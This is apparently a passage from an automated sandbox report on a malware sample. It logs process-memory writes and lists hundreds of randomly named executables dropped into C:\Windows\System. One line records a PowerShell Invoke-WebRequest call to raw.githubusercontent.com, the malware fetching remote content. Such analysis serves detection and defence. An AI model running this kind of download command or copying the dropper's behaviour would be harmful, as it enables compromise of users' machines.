PID 1740 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\iRJBSpE.exe
PID 1740 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\iRJBSpE.exe
PID 1740 wrote to memory of 2664 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\SoDOqkX.exe
PID 1740 wrote to memory of 2664 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\SoDOqkX.exe
PID 1740 wrote to memory of 2664 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\SoDOqkX.exe
PID 1740 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\EobvnCR.exe
PID 1740 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\EobvnCR.exe
PID 1740 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\EobvnCR.exe
PID 1740 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\FGRYSFW.exe
PID 1740 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\FGRYSFW.exe
PID 1740 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\FGRYSFW.exe
PID 1740 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\uLPtcli.exe
PID 1740 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\uLPtcli.exe
PID 1740 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\uLPtcli.exe
PID 1740 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\bmcyMQk.exe
PID 1740 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\bmcyMQk.exe
PID 1740 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\bmcyMQk.exe
PID 1740 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\eGygMIh.exe
PID 1740 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\eGygMIh.exe
PID 1740 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\eGygMIh.exe
PID 1740 wrote to memory of 3028 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\vJmUynQ.exe
PID 1740 wrote to memory of 3028 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\vJmUynQ.exe
PID 1740 wrote to memory of 3028 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\vJmUynQ.exe
PID 1740 wrote to memory of 1424 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\PlitksV.exe
PID 1740 wrote to memory of 1424 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\PlitksV.exe
PID 1740 wrote to memory of 1424 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\PlitksV.exe
PID 1740 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\FEiUQlh.exe
PID 1740 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\FEiUQlh.exe
PID 1740 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\FEiUQlh.exe
PID 1740 wrote to memory of 1148 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\fXJHDAR.exe
PID 1740 wrote to memory of 1148 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\fXJHDAR.exe
PID 1740 wrote to memory of 1148 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\fXJHDAR.exe
PID 1740 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\bNxsgUL.exe
PID 1740 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\bNxsgUL.exe
PID 1740 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\bNxsgUL.exe
PID 1740 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\OXnQvGR.exe
PID 1740 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\OXnQvGR.exe
PID 1740 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\OXnQvGR.exe
PID 1740 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\eKTDLTy.exe
PID 1740 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\eKTDLTy.exe
PID 1740 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\eKTDLTy.exe
PID 1740 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\TAbcggi.exe
PID 1740 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\TAbcggi.exe
PID 1740 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\TAbcggi.exe
PID 1740 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe C:\Windows\System\MKwCmnV.exe

Processes

C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\681fa5f55149496faf3c4088aa79b007_JaffaCakes118.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\xckLZbw.exe

C:\Windows\System\xckLZbw.exe

C:\Windows\System\EhsFdXx.exe

C:\Windows\System\EhsFdXx.exe

C:\Windows\System\nEmipTm.exe

C:\Windows\System\nEmipTm.exe

C:\Windows\System\DGpoDKQ.exe

C:\Windows\System\DGpoDKQ.exe

C:\Windows\System\DvvkNjE.exe

C:\Windows\System\DvvkNjE.exe

C:\Windows\System\iRJBSpE.exe

C:\Windows\System\iRJBSpE.exe

C:\Windows\System\SoDOqkX.exe

C:\Windows\System\SoDOqkX.exe

C:\Windows\System\EobvnCR.exe

C:\Windows\System\EobvnCR.exe

C:\Windows\System\FGRYSFW.exe

C:\Windows\System\FGRYSFW.exe

C:\Windows\System\uLPtcli.exe

C:\Windows\System\uLPtcli.exe

C:\Windows\System\bmcyMQk.exe

C:\Windows\System\bmcyMQk.exe

C:\Windows\System\eGygMIh.exe

C:\Windows\System\eGygMIh.exe

C:\Windows\System\vJmUynQ.exe

C:\Windows\System\vJmUynQ.exe

C:\Windows\System\PlitksV.exe

C:\Windows\System\PlitksV.exe

C:\Windows\System\FEiUQlh.exe

C:\Windows\System\FEiUQlh.exe

C:\Windows\System\fXJHDAR.exe

C:\Windows\System\fXJHDAR.exe

C:\Windows\System\bNxsgUL.exe

C:\Windows\System\bNxsgUL.exe

C:\Windows\System\OXnQvGR.exe

C:\Windows\System\OXnQvGR.exe

C:\Windows\System\eKTDLTy.exe

C:\Windows\System\eKTDLTy.exe

C:\Windows\System\TAbcggi.exe

C:\Windows\System\TAbcggi.exe

C:\Windows\System\MKwCmnV.exe

C:\Windows\System\MKwCmnV.exe

C:\Windows\System\HNCQdKv.exe

C:\Windows\System\HNCQdKv.exe

C:\Windows\System\JldVunT.exe

C:\Windows\System\JldVunT.exe

C:\Windows\System\hnaNkWZ.exe

C:\Windows\System\hnaNkWZ.exe

C:\Windows\System\BUYmGID.exe

C:\Windows\System\BUYmGID.exe

C:\Windows\System\PHdVjoa.exe

C:\Windows\System\PHdVjoa.exe

C:\Windows\System\OpkkRaP.exe

C:\Windows\System\OpkkRaP.exe

C:\Windows\System\mCFgOYK.exe

C:\Windows\System\mCFgOYK.exe

C:\Windows\System\buNRcRi.exe

C:\Windows\System\buNRcRi.exe

C:\Windows\System\WAAuQix.exe

C:\Windows\System\WAAuQix.exe

C:\Windows\System\zrScSgw.exe

C:\Windows\System\zrScSgw.exe

C:\Windows\System\tvnfEeT.exe

C:\Windows\System\tvnfEeT.exe

C:\Windows\System\LgVkKvI.exe

C:\Windows\System\LgVkKvI.exe

C:\Windows\System\lvZPCeb.exe

C:\Windows\System\lvZPCeb.exe

C:\Windows\System\ecRXgKg.exe

C:\Windows\System\ecRXgKg.exe

C:\Windows\System\zSYjFzB.exe

C:\Windows\System\zSYjFzB.exe

C:\Windows\System\hGzPJeV.exe

C:\Windows\System\hGzPJeV.exe

C:\Windows\System\tZPZFQH.exe

C:\Windows\System\tZPZFQH.exe

C:\Windows\System\pcHTAxN.exe

C:\Windows\System\pcHTAxN.exe

C:\Windows\System\zKveasS.exe

C:\Windows\System\zKveasS.exe

C:\Windows\System\YRHWGSS.exe

C:\Windows\System\YRHWGSS.exe

C:\Windows\System\WzJlRho.exe

C:\Windows\System\WzJlRho.exe

C:\Windows\System\jyEttXa.exe

C:\Windows\System\jyEttXa.exe

C:\Windows\System\dHxCoWn.exe

C:\Windows\System\dHxCoWn.exe

C:\Windows\System\TPPfhhc.exe

C:\Windows\System\TPPfhhc.exe

C:\Windows\System\oaaWsLL.exe

C:\Windows\System\oaaWsLL.exe

C:\Windows\System\Tskgctb.exe

C:\Windows\System\Tskgctb.exe

C:\Windows\System\kmLKNrG.exe

C:\Windows\System\kmLKNrG.exe

C:\Windows\System\uIdwHlS.exe

C:\Windows\System\uIdwHlS.exe

C:\Windows\System\RSwwQGv.exe

C:\Windows\System\RSwwQGv.exe

C:\Windows\System\EPXLcwZ.exe

C:\Windows\System\EPXLcwZ.exe

C:\Windows\System\NISsOfj.exe

C:\Windows\System\NISsOfj.exe

C:\Windows\System\vlsXMbn.exe

C:\Windows\System\vlsXMbn.exe

C:\Windows\System\WorHOtG.exe

C:\Windows\System\WorHOtG.exe

C:\Windows\System\yImJVFn.exe

C:\Windows\System\yImJVFn.exe

C:\Windows\System\OuFnbCt.exe

C:\Windows\System\OuFnbCt.exe

C:\Windows\System\QoFaNoP.exe

C:\Windows\System\QoFaNoP.exe

C:\Windows\System\bWTJZkv.exe

C:\Windows\System\bWTJZkv.exe

C:\Windows\System\msgQoFB.exe

C:\Windows\System\msgQoFB.exe

C:\Windows\System\hRoXhsk.exe

C:\Windows\System\hRoXhsk.exe

C:\Windows\System\GYVqMAW.exe

C:\Windows\System\GYVqMAW.exe

C:\Windows\System\KVmvRGs.exe

C:\Windows\System\KVmvRGs.exe

C:\Windows\System\sHTQcBQ.exe

C:\Windows\System\sHTQcBQ.exe

C:\Windows\System\yGWEcyh.exe

C:\Windows\System\yGWEcyh.exe

C:\Windows\System\Snlwoaz.exe

C:\Windows\System\Snlwoaz.exe

C:\Windows\System\PbqDxUy.exe

C:\Windows\System\PbqDxUy.exe

C:\Windows\System\HSoqSdf.exe

C:\Windows\System\HSoqSdf.exe

C:\Windows\System\FpSOKrm.exe

C:\Windows\System\FpSOKrm.exe

C:\Windows\System\dKImfgh.exe

C:\Windows\System\dKImfgh.exe

C:\Windows\System\VYMdKIO.exe

C:\Windows\System\VYMdKIO.exe

C:\Windows\System\IGcKIEu.exe

C:\Windows\System\IGcKIEu.exe

C:\Windows\System\GkohZoB.exe

C:\Windows\System\GkohZoB.exe

C:\Windows\System\RjZBOOD.exe

C:\Windows\System\RjZBOOD.exe

C:\Windows\System\VRMHmVu.exe

C:\Windows\System\VRMHmVu.exe

C:\Windows\System\wiiIdWq.exe

C:\Windows\System\wiiIdWq.exe

C:\Windows\System\YuGdVcf.exe

C:\Windows\System\YuGdVcf.exe

C:\Windows\System\tOvLGeh.exe

C:\Windows\System\tOvLGeh.exe

C:\Windows\System\PEGLzBN.exe

C:\Windows\System\PEGLzBN.exe

C:\Windows\System\AxjGAeZ.exe

C:\Windows\System\AxjGAeZ.exe

C:\Windows\System\crNPDUE.exe

C:\Windows\System\crNPDUE.exe

C:\Windows\System\AQqdThW.exe

C:\Windows\System\AQqdThW.exe

C:\Windows\System\wAqkqce.exe

C:\Windows\System\wAqkqce.exe

C:\Windows\System\XkHLlAX.exe

C:\Windows\System\XkHLlAX.exe

C:\Windows\System\OZdkEue.exe

C:\Windows\System\OZdkEue.exe

C:\Windows\System\Urceubv.exe

C:\Windows\System\Urceubv.exe

C:\Windows\System\FXhAwEG.exe

C:\Windows\System\FXhAwEG.exe

C:\Windows\System\ukumfqM.exe

C:\Windows\System\ukumfqM.exe

C:\Windows\System\lmIKRFt.exe

C:\Windows\System\lmIKRFt.exe

C:\Windows\System\EipMGxZ.exe

C:\Windows\System\EipMGxZ.exe

C:\Windows\System\DkfWtzX.exe

C:\Windows\System\DkfWtzX.exe

C:\Windows\System\cZMiapn.exe

C:\Windows\System\cZMiapn.exe

C:\Windows\System\oHPfzrB.exe

C:\Windows\System\oHPfzrB.exe

C:\Windows\System\VemXcxc.exe

C:\Windows\System\VemXcxc.exe

C:\Windows\System\eMtFPvO.exe

C:\Windows\System\eMtFPvO.exe

C:\Windows\System\shnnVAk.exe

C:\Windows\System\shnnVAk.exe

C:\Windows\System\MRnIOKZ.exe

C:\Windows\System\MRnIOKZ.exe

C:\Windows\System\wBIHZxV.exe

C:\Windows\System\wBIHZxV.exe

C:\Windows\System\MxmpjSY.exe

C:\Windows\System\MxmpjSY.exe

C:\Windows\System\mNeiCgq.exe

C:\Windows\System\mNeiCgq.exe

C:\Windows\System\JLKMNEp.exe

C:\Windows\System\JLKMNEp.exe

C:\Windows\System\OyoeuUA.exe

C:\Windows\System\OyoeuUA.exe

C:\Windows\System\LZobxrM.exe

C:\Windows\System\LZobxrM.exe

C:\Windows\System\gGOkISl.exe

C:\Windows\System\gGOkISl.exe

C:\Windows\System\RBrgVGx.exe

C:\Windows\System\RBrgVGx.exe

C:\Windows\System\NGjAwNg.exe

C:\Windows\System\NGjAwNg.exe

C:\Windows\System\vBDjKbJ.exe

C:\Windows\System\vBDjKbJ.exe

C:\Windows\System\bjjsOPG.exe

C:\Windows\System\bjjsOPG.exe

C:\Windows\System\NDigXzd.exe

C:\Windows\System\NDigXzd.exe

C:\Windows\System\iiOaHYl.exe

C:\Windows\System\iiOaHYl.exe

C:\Windows\System\xRfMyiw.exe

C:\Windows\System\xRfMyiw.exe

C:\Windows\System\IYfNghZ.exe

C:\Windows\System\IYfNghZ.exe

C:\Windows\System\MDESdxm.exe

C:\Windows\System\MDESdxm.exe

C:\Windows\System\RJDsaRD.exe

C:\Windows\System\RJDsaRD.exe

C:\Windows\System\zyNYNgk.exe

C:\Windows\System\zyNYNgk.exe

C:\Windows\System\msxyTdC.exe

C:\Windows\System\msxyTdC.exe

C:\Windows\System\QfCTbwa.exe

C:\Windows\System\QfCTbwa.exe

C:\Windows\System\FfJEPlD.exe

C:\Windows\System\FfJEPlD.exe

C:\Windows\System\UAURJWn.exe

C:\Windows\System\UAURJWn.exe

C:\Windows\System\BzfXhaU.exe

C:\Windows\System\BzfXhaU.exe

C:\Windows\System\TLKMmZV.exe

C:\Windows\System\TLKMmZV.exe

C:\Windows\System\NyaRLuW.exe

C:\Windows\System\NyaRLuW.exe

C:\Windows\System\gYqTfMG.exe

C:\Windows\System\gYqTfMG.exe

C:\Windows\System\pooLhiD.exe

C:\Windows\System\pooLhiD.exe

C:\Windows\System\hytLgVE.exe

C:\Windows\System\hytLgVE.exe

C:\Windows\System\gbsXlxU.exe

C:\Windows\System\gbsXlxU.exe

C:\Windows\System\HVrmDpX.exe

C:\Windows\System\HVrmDpX.exe

C:\Windows\System\dzNpAET.exe

C:\Windows\System\dzNpAET.exe

C:\Windows\System\XpOqSgh.exe

C:\Windows\System\XpOqSgh.exe

C:\Windows\System\LiymQWT.exe

C:\Windows\System\LiymQWT.exe

C:\Windows\System\DYlMvQF.exe

C:\Windows\System\DYlMvQF.exe

C:\Windows\System\bVDQCbg.exe

C:\Windows\System\bVDQCbg.exe

C:\Windows\System\TUKZyfY.exe

C:\Windows\System\TUKZyfY.exe

C:\Windows\System\jPbTrUG.exe

C:\Windows\System\jPbTrUG.exe

C:\Windows\System\bOeViKG.exe

C:\Windows\System\bOeViKG.exe

C:\Windows\System\JhnDemS.exe

C:\Windows\System\JhnDemS.exe

C:\Windows\System\fmgvVvc.exe

C:\Windows\System\fmgvVvc.exe

C:\Windows\System\fwcDqKK.exe

C:\Windows\System\fwcDqKK.exe

C:\Windows\System\dwCDHKl.exe

C:\Windows\System\dwCDHKl.exe

C:\Windows\System\ikylIrY.exe

C:\Windows\System\ikylIrY.exe

C:\Windows\System\RzHMzWO.exe

C:\Windows\System\RzHMzWO.exe

C:\Windows\System\INRWhSV.exe

C:\Windows\System\INRWhSV.exe

C:\Windows\System\GfDeDNT.exe

C:\Windows\System\GfDeDNT.exe

C:\Windows\System\UbvJghr.exe

C:\Windows\System\UbvJghr.exe

C:\Windows\System\WmrJSwd.exe

C:\Windows\System\WmrJSwd.exe

C:\Windows\System\rrecGJu.exe

C:\Windows\System\rrecGJu.exe

C:\Windows\System\uryswhP.exe

C:\Windows\System\uryswhP.exe

C:\Windows\System\cEVuKhK.exe

C:\Windows\System\cEVuKhK.exe

C:\Windows\System\xKHKxWr.exe

C:\Windows\System\xKHKxWr.exe

C:\Windows\System\dayRYYD.exe

C:\Windows\System\dayRYYD.exe

C:\Windows\System\iKXwvsG.exe

C:\Windows\System\iKXwvsG.exe

C:\Windows\System\PjHZqYZ.exe

C:\Windows\System\PjHZqYZ.exe

C:\Windows\System\WXQDyNp.exe

C:\Windows\System\WXQDyNp.exe

C:\Windows\System\ywFbKgm.exe

C:\Windows\System\ywFbKgm.exe

C:\Windows\System\vQHyrtA.exe

C:\Windows\System\vQHyrtA.exe

C:\Windows\System\yiRfHZf.exe

C:\Windows\System\yiRfHZf.exe

C:\Windows\System\IVMPVNC.exe

C:\Windows\System\IVMPVNC.exe

C:\Windows\System\jLAgPWG.exe

C:\Windows\System\jLAgPWG.exe

C:\Windows\System\cQaaTTa.exe

C:\Windows\System\cQaaTTa.exe

C:\Windows\System\fzjblpC.exe

C:\Windows\System\fzjblpC.exe

C:\Windows\System\gKElPaD.exe

C:\Windows\System\gKElPaD.exe

C:\Windows\System\UOvUNpY.exe

C:\Windows\System\UOvUNpY.exe

C:\Windows\System\sNohKHX.exe

C:\Windows\System\sNohKHX.exe

C:\Windows\System\fDwInmy.exe

C:\Windows\System\fDwInmy.exe

C:\Windows\System\WscdZHr.exe

C:\Windows\System\WscdZHr.exe

C:\Windows\System\eJsYNHT.exe

C:\Windows\System\eJsYNHT.exe

C:\Windows\System\saAuKQH.exe

C:\Windows\System\saAuKQH.exe

C:\Windows\System\ixOiJZO.exe

C:\Windows\System\ixOiJZO.exe

C:\Windows\System\HCBBLJI.exe

C:\Windows\System\HCBBLJI.exe

C:\Windows\System\dLaSTOQ.exe

C:\Windows\System\dLaSTOQ.exe

C:\Windows\System\xWitfKy.exe

C:\Windows\System\xWitfKy.exe

C:\Windows\System\fODXRvN.exe

C:\Windows\System\fODXRvN.exe

C:\Windows\System\rAKXAOV.exe

C:\Windows\System\rAKXAOV.exe

C:\Windows\System\xAvALfe.exe

C:\Windows\System\xAvALfe.exe

C:\Windows\System\GIfsUPr.exe

C:\Windows\System\GIfsUPr.exe

C:\Windows\System\wAZzFUJ.exe

C:\Windows\System\wAZzFUJ.exe

C:\Windows\System\EjqCbfa.exe

C:\Windows\System\EjqCbfa.exe

C:\Windows\System\ErSVOAz.exe

C:\Windows\System\ErSVOAz.exe

C:\Windows\System\CsoIIVg.exe

C:\Windows\System\CsoIIVg.exe

C:\Windows\System\PryBOKp.exe

C:\Windows\System\PryBOKp.exe

C:\Windows\System\hGSvQzu.exe

C:\Windows\System\hGSvQzu.exe

C:\Windows\System\AzYkBsF.exe

C:\Windows\System\AzYkBsF.exe

C:\Windows\System\vIQkROi.exe

C:\Windows\System\vIQkROi.exe

C:\Windows\System\bzfryUX.exe

C:\Windows\System\bzfryUX.exe

C:\Windows\System\EnBUYoR.exe

C:\Windows\System\EnBUYoR.exe

C:\Windows\System\QsCUOHQ.exe

C:\Windows\System\QsCUOHQ.exe

C:\Windows\System\vMWFclB.exe

C:\Windows\System\vMWFclB.exe

C:\Windows\System\yjipkgE.exe

C:\Windows\System\yjipkgE.exe

C:\Windows\System\TbSLxgN.exe

C:\Windows\System\TbSLxgN.exe

C:\Windows\System\rXloRxh.exe

C:\Windows\System\rXloRxh.exe

C:\Windows\System\OmYsVNf.exe

C:\Windows\System\OmYsVNf.exe

C:\Windows\System\bXITIMk.exe

C:\Windows\System\bXITIMk.exe

C:\Windows\System\xOkYjWI.exe

C:\Windows\System\xOkYjWI.exe

C:\Windows\System\elaRlNR.exe

C:\Windows\System\elaRlNR.exe

C:\Windows\System\Hvqsgxp.exe

C:\Windows\System\Hvqsgxp.exe

C:\Windows\System\QDIpcpt.exe

C:\Windows\System\QDIpcpt.exe

C:\Windows\System\rLyVHIR.exe

C:\Windows\System\rLyVHIR.exe

C:\Windows\System\uTjTJpr.exe

C:\Windows\System\uTjTJpr.exe

C:\Windows\System\zosePGY.exe

C:\Windows\System\zosePGY.exe

C:\Windows\System\MTfitKM.exe

C:\Windows\System\MTfitKM.exe

C:\Windows\System\aeFQkNT.exe

C:\Windows\System\aeFQkNT.exe

C:\Windows\System\khUmbcb.exe

C:\Windows\System\khUmbcb.exe

C:\Windows\System\hCmyaPM.exe

C:\Windows\System\hCmyaPM.exe

C:\Windows\System\hNnVDVV.exe

C:\Windows\System\hNnVDVV.exe

C:\Windows\System\VTjIhOT.exe

C:\Windows\System\VTjIhOT.exe

C:\Windows\System\ImUgDZe.exe

C:\Windows\System\ImUgDZe.exe

C:\Windows\System\IGGWIvH.exe

C:\Windows\System\IGGWIvH.exe

C:\Windows\System\gujCRqe.exe

C:\Windows\System\gujCRqe.exe

C:\Windows\System\MKqmfYH.exe

C:\Windows\System\MKqmfYH.exe

C:\Windows\System\MjPHdGQ.exe

C:\Windows\System\MjPHdGQ.exe

C:\Windows\System\etPbFHr.exe

C:\Windows\System\etPbFHr.exe

C:\Windows\System\aiFIyKW.exe

C:\Windows\System\aiFIyKW.exe

C:\Windows\System\NTlZnMe.exe

C:\Windows\System\NTlZnMe.exe

C:\Windows\System\CqaKWRg.exe

C:\Windows\System\CqaKWRg.exe

C:\Windows\System\lkVKUzg.exe

C:\Windows\System\lkVKUzg.exe

C:\Windows\System\qjDJBDt.exe

C:\Windows\System\qjDJBDt.exe

C:\Windows\System\oNRGAwN.exe

C:\Windows\System\oNRGAwN.exe

C:\Windows\System\bCVkzGA.exe

C:\Windows\System\bCVkzGA.exe

C:\Windows\System\cJoRvIF.exe

C:\Windows\System\cJoRvIF.exe

C:\Windows\System\lKoGOle.exe

C:\Windows\System\lKoGOle.exe

C:\Windows\System\ASpIfhg.exe

C:\Windows\System\ASpIfhg.exe

C:\Windows\System\eCAokOH.exe

C:\Windows\System\eCAokOH.exe

C:\Windows\System\hVjvsUu.exe

C:\Windows\System\hVjvsUu.exe

C:\Windows\System\RGDDtJd.exe

C:\Windows\System\RGDDtJd.exe

C:\Windows\System\AsXALad.exe

C:\Windows\System\AsXALad.exe

C:\Windows\System\uHpeGXx.exe

C:\Windows\System\uHpeGXx.exe

C:\Windows\System\tOwpkrb.exe

C:\Windows\System\tOwpkrb.exe

C:\Windows\System\EwgdLYH.exe

C:\Windows\System\EwgdLYH.exe

C:\Windows\System\ZRSMubu.exe

C:\Windows\System\ZRSMubu.exe

C:\Windows\System\AtRWDad.exe

C:\Windows\System\AtRWDad.exe

C:\Windows\System\MyQuvrY.exe

C:\Windows\System\MyQuvrY.exe

C:\Windows\System\rLJpWjh.exe

C:\Windows\System\rLJpWjh.exe

C:\Windows\System\tmxezrf.exe

C:\Windows\System\tmxezrf.exe

C:\Windows\System\roReClW.exe

C:\Windows\System\roReClW.exe

C:\Windows\System\MFPCWdW.exe

C:\Windows\System\MFPCWdW.exe

C:\Windows\System\oMCsCGE.exe

C:\Windows\System\oMCsCGE.exe

C:\Windows\System\AYhrgfH.exe

C:\Windows\System\AYhrgfH.exe

C:\Windows\System\pIZJKDi.exe

C:\Windows\System\pIZJKDi.exe

C:\Windows\System\QAOdHyX.exe

C:\Windows\System\QAOdHyX.exe

C:\Windows\System\fgbWGUX.exe

C:\Windows\System\fgbWGUX.exe

C:\Windows\System\IIqNLNp.exe

C:\Windows\System\IIqNLNp.exe

C:\Windows\System\dsIrOEI.exe

C:\Windows\System\dsIrOEI.exe

C:\Windows\System\mNMWyXx.exe

C:\Windows\System\mNMWyXx.exe

C:\Windows\System\etEHfHN.exe

C:\Windows\System\etEHfHN.exe

C:\Windows\System\dVRgKRj.exe

C:\Windows\System\dVRgKRj.exe

C:\Windows\System\TJAnOPI.exe

C:\Windows\System\TJAnOPI.exe

C:\Windows\System\GlMRykn.exe

C:\Windows\System\GlMRykn.exe

C:\Windows\System\nSXnTFf.exe

C:\Windows\System\nSXnTFf.exe

C:\Windows\System\OFRPUQE.exe

C:\Windows\System\OFRPUQE.exe

C:\Windows\System\ijeuxJD.exe

C:\Windows\System\ijeuxJD.exe

C:\Windows\System\yKJGAyD.exe

C:\Windows\System\yKJGAyD.exe

C:\Windows\System\rUGyHWV.exe

C:\Windows\System\rUGyHWV.exe

C:\Windows\System\LFfltIM.exe

C:\Windows\System\LFfltIM.exe

C:\Windows\System\KGYAItP.exe

C:\Windows\System\KGYAItP.exe

C:\Windows\System\hqAWsMR.exe

C:\Windows\System\hqAWsMR.exe

C:\Windows\System\RDxfsjy.exe

C:\Windows\System\RDxfsjy.exe

C:\Windows\System\EqkhyYo.exe

C:\Windows\System\EqkhyYo.exe

C:\Windows\System\ItWeeyg.exe

C:\Windows\System\ItWeeyg.exe

C:\Windows\System\sghcwGA.exe

C:\Windows\System\sghcwGA.exe

C:\Windows\System\GLjmFLp.exe

C:\Windows\System\GLjmFLp.exe

C:\Windows\System\qbhfEAn.exe

C:\Windows\System\qbhfEAn.exe

C:\Windows\System\KcpmGGn.exe

C:\Windows\System\KcpmGGn.exe

C:\Windows\System\uvitNsr.exe

C:\Windows\System\uvitNsr.exe

C:\Windows\System\SNtWkMo.exe

C:\Windows\System\SNtWkMo.exe

C:\Windows\System\xhfLmTd.exe

C:\Windows\System\xhfLmTd.exe

C:\Windows\System\MjKCEsx.exe

C:\Windows\System\MjKCEsx.exe

C:\Windows\System\fywVooO.exe

C:\Windows\System\fywVooO.exe

C:\Windows\System\wjeEEzS.exe

C:\Windows\System\wjeEEzS.exe

C:\Windows\System\TYaNsAR.exe

C:\Windows\System\TYaNsAR.exe

C:\Windows\System\FhaYvJi.exe

C:\Windows\System\FhaYvJi.exe

C:\Windows\System\cJCAtvc.exe

C:\Windows\System\cJCAtvc.exe

C:\Windows\System\ugXnbda.exe

C:\Windows\System\ugXnbda.exe

C:\Windows\System\zJvrHkc.exe

